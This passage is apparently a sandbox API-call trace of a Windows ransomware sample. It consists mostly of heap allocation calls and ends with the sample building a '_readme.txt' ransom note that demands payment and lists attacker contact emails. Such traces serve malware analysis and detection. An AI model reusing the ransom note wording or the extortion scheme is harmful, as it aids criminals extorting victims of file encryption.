lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.655] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.656] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.657] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.661] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0165.661] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.661] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.661] PathFindFileNameW (pszPath="") returned="" [0165.661] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.662] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.662] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.662] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.662] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0165.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.662] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0165.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.662] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.662] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal 